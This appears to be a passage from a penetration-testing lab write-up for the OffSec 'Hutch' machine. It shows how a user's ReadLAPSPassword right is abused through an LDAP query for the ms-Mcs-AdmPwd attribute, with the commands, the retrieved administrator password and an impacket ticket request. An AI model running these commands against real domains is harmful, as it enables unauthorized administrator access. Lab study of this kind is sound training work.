ReadLAPSPassword
/Practice/Hutch/3-Exploitation/attachments/{8F511025-CCC8-4737-AF06-06505A4EE3B0}.png)
As discovered during the bloodhound session, the fmcsorley user has the ReadLAPSPassword access to the hutchdc.hutch.offsec host
While there are multiple ways to abuse the privileges granted to read LAPS passwords on the compromised user account, it’s important to note that the password information is stored as an LDAP attribute within the Active Directory schema. This schema extension allows for the centralized storage of local administrator passwords for domain computers.
Consequently, these passwords can be queried remotely through LDAP without requiring the establishment of a PowerShell session, making it a potential security risk when unauthorized access to the schema is obtained.
Therefore, it can be checked through an LDAP query
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ KRB5CCNAME=fmcsorley@hutchdc.hutch.offsec.ccache powerview HUTCH.OFFSEC/fmcsorley@hutchdc.hutch.offsec -k --no-pass --dc-ip $IP -ns $IP -q 'Get-DomainObject "CN=HUTCHDC,OU=DOMAIN CONTROLLERS,DC=HUTCH,DC=OFFSEC" -ResolveGUIDs' | grep -i ms-Mcs-AdmPwd
[2025-05-01 16:06:45] [Storage] Using cache directory: /home/kali/.powerview/storage/ldap_cache
ms-Mcs-AdmPwd : 8(31je1dN1EtuX
ms-Mcs-AdmPwdExpirationTime : 133931679179139426While any LDAP tool can be used for querying, I find the Python implementation of PowerView powerful as it accepts the TGT. ms-mcs-admpwd is the LDAP attribute that stores the LAPS password
The LAPS password is 8(31je1dN1EtuX
Validation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hutch]
└─$ impacket-getTGT HUTCH.OFFSEC/administrator@hutchdc.hutch.offsec -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password: 8(31je1dN1EtuX
[*] Saving ticket in administrator@hutchdc.hutch.offsec.ccacheValidated
TGT generated for the administrator user
Moving on to the Privilege Escalation phase